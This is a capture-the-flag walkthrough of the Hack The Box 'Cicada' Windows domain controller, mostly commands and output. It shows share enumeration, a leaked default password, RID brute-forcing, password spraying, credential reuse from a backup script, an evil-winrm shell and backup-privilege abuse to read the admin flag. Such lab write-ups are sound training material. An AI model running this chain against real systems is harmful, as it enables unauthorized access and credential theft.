Scribd
Upload
75 views8 pages

Scan

cicada

Uploaded by

hpu16328
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
75 views8 pages

Scan

cicada

Uploaded by

hpu16328
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 8

# Nmap 7.

94SVN scan initiated Tue Oct 15 14:06:50 2024 as: /usr/lib/nmap/nmap --


privileged -sC -sV -p- -oN scan.txt 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up (0.027s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-15
19:09:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:
cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>,
DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain:
cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>,
DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:
cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>,
DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain:
cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>,
DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49311/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2024-10-15T19:10:18
|_ start_date: N/A

Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
# Nmap done at Tue Oct 15 14:10:57 2024 -- 1 IP address (1 host up) scanned in
247.76 seconds

############################################################
Enumeration of shares

smbclient -L 10.10.11.35
Password for [WORKGROUP\kali]:

Sharename Type Comment


--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
###################################################################################
###################################################################################
################################

Find Open share as anonymous and found HR message containing password:

smbclient -U '' \\\\10.10.11.35/HR


Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024

4168447 blocks of size 4096. 308571 blocks available


smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (10.7
KiloBytes/sec) (average 10.7 KiloBytes/sec)

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our
security protocols, it's essential that you change your default password to
something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default
password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change
Password".
4. Follow the prompts to create a new password**. Make sure your new password is
strong, containing a mix of uppercase letters, lowercase letters, numbers, and
special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please
do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't
hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada
Corp team!

Best regards,
Cicada Corp
###################################################################################
###################################################################################
###################################
Scan users domain:

netexec smb 10.10.11.35 -u guest -p '' --rid-brute


SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build
20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-
only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers
(SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy
Creator Owners (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain
Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain
Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key
Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers
(SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC
Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC
Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins
(SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support
(SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars
(SidTypeUser)

┌──(kali㉿kali)-[~/cicada.htb]
Filter for users only

└─$ netexec smb 10.10.11.35 -u guest -p '' --rid-brute | grep SidTypeUser


SMB 10.10.11.35 445 CICADA-DC 500: CICADA\
Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\
CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\
john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\
sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\
michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\
david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\
emily.oscars (SidTypeUser)
###################################################################################
###################################################################################
#########################################
Save users list in a file for further scans

netexec smb 10.10.11.35 -u guest -p '' --rid-brute | grep SidTypeUser > users.txt

┌──(kali㉿kali)-[~/cicada.htb]
└─$ cat users.txt
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\
Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt
(SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\
CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\
john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\
sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\
michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\
david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\
emily.oscars (SidTypeUser)

┌──(kali㉿kali)-[~/cicada.htb]
└─$ cat users.txt | grep SidTypeUser | awk '{print $6}' | awk -F\\ '{print $2}' >
cicada.htb-users.txt

┌──(kali㉿kali)-[~/cicada.htb]
└─$ cat cicada.htb-users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
###################################################################################
###################################################################################
########
Spray password against saves users list, and found 1 valid user

netexec smb 10.10.11.35 -u cicada.htb-users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'


SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build
20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\
Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\
Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\
krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\CICADA-
DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\
john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\
sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
###################################################################################
###################################################################################
#########

I installed the enum4linux-ng, I had only the enum4linux and realize was wrong at
this point. After the new tool installed I found new user and password.
...

| Users via RPC on 10.10.11.35 |


====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 8 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 8 user(s) via 'enumdomusers'
[+] After merging user results we have 8 user(s) total:
'1104':
username: john.smoulder
name: (null)
acb: '0x00000210'
description: (null)
'1105':
username: sarah.dantelia
name: (null)
acb: '0x00000210'
description: (null)
'1106':
username: michael.wrightson
name: (null)
acb: '0x00000210'
description: (null)
'1108':
username: david.orelious
name: (null)
acb: '0x00000210'
description: Just in case I forget my password is aRt$Lp#7t*VQ!3

...
###################################################################################
##############################
I tried with this credentials to browse the other share DEV on 10.10.11.35 and
found a ps1 script

smbclient -U david.orelious \\\\10.10.11.35/DEV


Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024

4168447 blocks of size 4096. 307656 blocks available


###################################################################################
##############################
In the script there is a user and password for connecting to the machine

cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username,
$password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
###################################################################################
#################################
Since we have TCP port 5985 open we can try to connect and grab user.txt Flag

evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Evil-WinRM shell v3.6

Warning: Remote path completions is disabled due to ruby limitation:


quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub:


https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ..
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> cd Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir

Directory: C:\Users\emily.oscars.CICADA\Desktop

Mode LastWriteTime Length Name


---- ------------- ------ ----
-ar--- 10/15/2024 4:02 AM 34 user.txt

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt


0f11ef3d70fb401270a033fcb5b673f6
###################################################################################
#########################################################
Running for Privescalation I found the user has Backupoperator rights

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State


============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
###################################################################################
############################################################
We can leverage on robocopy command as the user emily.oscars is in the backup
operator group and grab root.txt Flag

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> robocopy C:\Users\


Administrator\Desktop C:\Users\Public root.txt /B
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------

Started : Tuesday, October 15, 2024 2:25:56 PM


Source : C:\Users\Administrator\Desktop\
Dest : C:\Users\Public\

Files : root.txt

Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

1 C:\Users\Administrator\Desktop\

------------------------------------------------------------------------------

Total Copied Skipped Mismatch FAILED Extras


Dirs : 1 0 1 0 0 0
Files : 1 0 1 0 0 0
Bytes : 34 0 34 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Ended : Tuesday, October 15, 2024 2:25:56 PM

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type C:\Users\Public\root.txt


a4e4a64c14fa2978768926bff7cd7596
###################################################################################
#############################################

You might also like